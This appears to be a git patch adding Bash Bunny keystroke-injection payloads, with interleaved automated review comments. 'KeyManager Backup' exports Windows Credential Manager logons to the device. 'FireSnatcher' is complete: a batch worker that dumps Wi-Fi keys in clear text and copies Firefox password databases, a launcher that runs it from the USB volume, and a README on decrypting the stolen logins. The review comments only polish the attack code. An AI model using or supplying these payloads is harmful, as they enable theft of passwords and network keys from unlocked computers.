+QUACK DELAY 200
+RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr"
+QUACK DELAY 200
+# button: Backup up...
+QUACK ALT b
+QUACK DELAY 200
+# button: Browse...
+QUACK ALT b
+# file name
+QUACK STRING "backup"
+# select task bar
+QUACK ALT d
+QUACK DELAY 200
+# look for bunny
+QUACK STRING "BashBunny"
+QUACK DELAY 600
+#select drive
+QUACK DOWNARROW
+# add loot folder
+QUACK STRING "/loot"
+QUACK ENTER
+QUACK DELAY 200
+# button: Save
+QUACK ALT s
+QUACK DELAY 200
+# button: Next
+QUACK ALT n
+QUACK DELAY 200
+# note: keycroc you can uses CTRL-ALT-DELETE
+QUACK CTRL-ALT DELETE
+QUACK DELAY 200
+QUACK STRING "$password"
+QUACK TAB
+QUACK STRING "$password"
+# button: Next
+QUACK ALT n
+QUACK DELAY 300
+# button: Finish
+QUACK ALT f
+QUACK DELAY 200
+# button: Close
+QUACK ALT c
+
+LED FINISH
+
diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md
new file mode 100644
index 00000000..89c5fdbd
--- /dev/null
+++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md
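Review bot: The `password=lamepassword` default in the Config block is a fixed, published string, and it is the only thing protecting the credential backup that the two `QUACK STRING "$password"` lines set up. If the operator forgets to change it, the file written under `/loot` on the removable volume is readable by anyone who picks up the device. Ship the variable empty and stop before `LED SETUP` when it is unset, for example `password=` followed by `[ -n "$password" ] || { LED FAIL; exit 1; }`. The header comment should also state that the value has to be set per engagement, since the readme's Config section names the variable but not its default.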
@@ -0,0 +1,30 @@ +# KeyManager Backup +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: Exfiltration +- Attackmode: HID & STORAGE +- Extensions: Run +- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777 + +## Description +Create a backup of the key manager which stores log-on credentials for servers, websites and programs. + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Config +set the password for the backup by setting the `password` variable + +## Notes +This payload relays heavily on button shortcuts this mean it is very target to an English version of windows. +If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file From f12c486e122e1fb37340538a7909269b152d8ff6 Mon Sep 17 00:00:00 2001 From: KarrotKak3 <104325530+KarrotKak3@users.noreply.github.com> Date: Fri, 29 Apr 2022 19:05:40 -0400 Subject: [PATCH 5/5] Add files via upload (#518) New Payload. FireSnatcher --- .../credentials/FireSnatcher/FireSnatcher.bat | 6 ++ .../credentials/FireSnatcher/README.md | 45 +++++++++++ .../credentials/FireSnatcher/payload.txt | 78 +++++++++++++++++++ 3 files changed, 129 insertions(+) create mode 100644 payloads/library/credentials/FireSnatcher/FireSnatcher.bat create mode 100644 payloads/library/credentials/FireSnatcher/README.md create mode 100644 payloads/library/credentials/FireSnatcher/payload.txt 
diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat
new file mode 100644
index 00000000..d08c8229
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat
@@ -0,0 +1,6 @@
+mkdir %~dp0\loot\%COMPUTERNAME%
+cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
+C: cd \D %appdata%\mozilla\firefox\profiles\
+cd %appdata%\mozilla\firefox\profiles\*.default-release\
+copy key4.db %~dp0\loot\%COMPUTERNAME%
+copy logins.json %~dp0\loot\%COMPUTERNAME%
\ No newline at end of file
diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md
new file mode 100644
index 00000000..1d3b0dd0
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/README.md
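Review bot: FireSnatcher.bat carries no comment on what it reads and writes, so its footprint has to be inferred from six bare commands. That matters here because `netsh wlan export profile key=clear` and the two `copy` lines leave Wi-Fi keys, `key4.db` and `logins.json` unencrypted under `loot\%COMPUTERNAME%` on removable storage. A one-line header such as `REM Writes to %~dp0\loot\%COMPUTERNAME%: WLAN profile XML (keys in clear text), key4.db, logins.json` would tell whoever handles the device afterwards, or writes detections for the script, what it produces. The README added in the same commit lists the targets but not the output files or their unprotected state.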
@@ -0,0 +1,45 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +**LED meanings** +- Magenta: Initial setup – about 1 – 3 seconds +- Single yellow blink: Attack in progress +- Green rapid flash, then solid, then off: Attack complete diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt new file mode 100644 index 00000000..143efd55 --- /dev/null +++ b/payloads/library/credentials/FireSnatcher/payload.txt 
@@ -0,0 +1,78 @@ +# Title: FireSnatcher +# Description: Copies Wifi Keys, and Firefox Password Databases +# Author: KarrotKak3 +# Props: saintcrossbow & 0iphor13 +# Version: 1.0.2.0 (Work in Progress) +# Category: Credentials +# Target: Windows (Logged in) +# Attackmodes: HID, Storage + +# Full Description +# ---------------- +# Attacks an Unlocked Windows Machine +# Payload targets: +# - All WiFi creds +# - Firefox Saved Password Database +# +# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC +# Delays to Allow Powershell Time to Open and to Give Attack time to Run + +# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT +# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE +# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins + + +# KNOWN ISSUES +# --------------- +# Loot is saved in Payloads/switch#/loot + + +# Files +# ----- +# - payload.txt: Starts the attack. All configuration contained in this file. +# - FireSnatcher.bat: Worker that grabs Creds + + +# Setup +# ----- +# - Place the payload.txt and FireSnatcher.bat in Payload folder +# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running) +# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility + +# LEDs +# ---- +# Magenta: Initial setup – about 1 – 3 seconds +# Single yellow blink: Attack in progress +# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed + +# Options +# ------- +# Name of Bash Bunny volume that appears to Windows (BashBunny is default) +BB_NAME="BashBunny" + +# Setup +# ----- +LED SETUP + + +# Attack +# ------ +ATTACKMODE HID STORAGE +Q DELAY 500 +LED ATTACK +Q DELAY 100 +Q GUI r +Q DELAY 100 +Q STRING powershell Start-Process powershell +Q ENTER +Q DELAY 7000 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')" +Q ENTER +Q DELAY 8000 +Q STRING EXIT +Q 
ENTER +sync +LED FINISH +Q DELAY 1500 +shutdown now +
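Review bot: `BB_NAME="BashBunny"` is documented under Options as the volume name to configure, but nothing after the assignment reads it; the `Q STRING "iex(...)"` line carries the literal label `BashBunny` instead. As written the option is dead configuration and the comment above it is misleading. Either drop the assignment or correct the comment, for example `# Volume label is fixed to BashBunny in the Q STRING line below; BB_NAME is not read`. The header line "All configuration contained in this file" overstates things for the same reason.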